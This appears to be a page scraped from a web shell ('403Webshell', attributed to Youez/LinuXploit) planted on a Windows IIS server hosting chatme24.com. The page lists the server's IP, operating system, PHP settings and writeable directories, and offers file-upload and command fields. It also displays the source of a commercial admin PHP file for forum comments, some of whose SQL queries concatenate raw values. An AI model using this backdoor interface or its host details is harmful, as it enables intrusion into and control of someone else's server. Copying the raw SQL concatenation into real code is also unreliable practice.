403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/groups_forum_comments.php
<?php
/* (C) Websplosion LLC, 2001-2021

IMPORTANT: This is a commercial software product
and any kind of using it must agree to the Websplosion's license agreement.
It can be found at http://www.chameleonsocial.com/license.doc

This notice may not be removed from the source code. */

include("../_include/core/administration_start.php");
require_once("../_include/current/places/tools.php");

class CPlaces extends CHtmlList
{
	function action()
	{
	}
	function init()
	{
		global $g;

		$this->m_on_page = 20;
		$this->m_on_bar = 10;

		$this->m_sql_count = "SELECT COUNT(m.forum_id) FROM groups_forum_comment AS m " . $this->m_sql_from_add . "";
		$this->m_sql = "
			SELECT m.*
			FROM groups_forum_comment AS m
			" . $this->m_sql_from_add . "
		";

        $this->m_field['comment_id'] = array("comment_id", null);
		$this->m_field['forum_id'] = array("forum_id", null);
		$this->m_field['user_id'] = array("user_id", null);
		$this->m_field['comment_text'] = array("comment_text", null);
		$this->m_field['created_at'] = array("created_at", null);

		$where = "";
		#$this->m_debug = "Y";

        $forum_id = get_param('forum_id');
        if($forum_id)
        {
            $where .= " AND forum_id = " . to_sql($forum_id, 'Number');
        }

		$this->m_sql_where = "1" . $where;
		$this->m_sql_order = "forum_id";
		$this->m_sql_from_add = "";
	}
	function parseBlock(&$html)
	{

		$forumId = get_param_int('forum_id');
		$html->setvar('forum_ids', $forumId);
		if ($forumId) {
			$html->setvar('forum_title', DB::result("SELECT forum_title FROM groups_forum WHERE forum_id=" . to_sql($forumId), 0, 2));
			$html->parse('forum_title', false);
		}

		parent::parseBlock($html);
	}
	function onItem(&$html, $row, $i, $last)
	{
		global $g;

        $this->m_field['user_id'][1] = DB::result("SELECT name FROM user WHERE user_id=" . $row['user_id'] . "", 0, 2);
        if ($this->m_field['user_id'][1] == "") $this->m_field['user_id'][1] = "blank";

        $this->m_field['forum_id'][1] = DB::result("SELECT forum_title FROM groups_forum WHERE forum_id=" . $row['forum_id'] . "", 0, 2);
        if ($this->m_field['forum_id'][1] == "") $this->m_field['forum_id'][1] = "blank";

        $this->m_field['comment_text'][1] = strcut($row['comment_text'], 48);

        if ($i % 2 == 0) {
            $html->setvar("class", 'color');
            $html->setvar("decl", '_l');
            $html->setvar("decr", '_r');
        } else {
            $html->setvar("class", '');
            $html->setvar("decl", '');
            $html->setvar("decr", '');
        }

		$forumId = get_param_int('forum_id');
		if (!$forumId) {
			$html->parse('forum_th', false);
			$html->setvar('forum_title_td', $this->m_field['forum_id'][1]);
			$html->parse('forum_td', false);
		}

		parent::onItem($html, $row, $i, $last);
	}
}

$page = new CPlaces("main", $g['tmpl']['dir_tmpl_administration'] . "groups_forum_comments.html");
$header = new CAdminHeader("header", $g['tmpl']['dir_tmpl_administration'] . "_header.html");
$page->add($header);
$footer = new CAdminFooter("footer", $g['tmpl']['dir_tmpl_administration'] . "_footer.html");
$page->add($footer);

$page->add(new CAdminPageMenuGroups());

include("../_include/core/administration_close.php");

Youez - 2016 - github.com/yon3zu
LinuXploit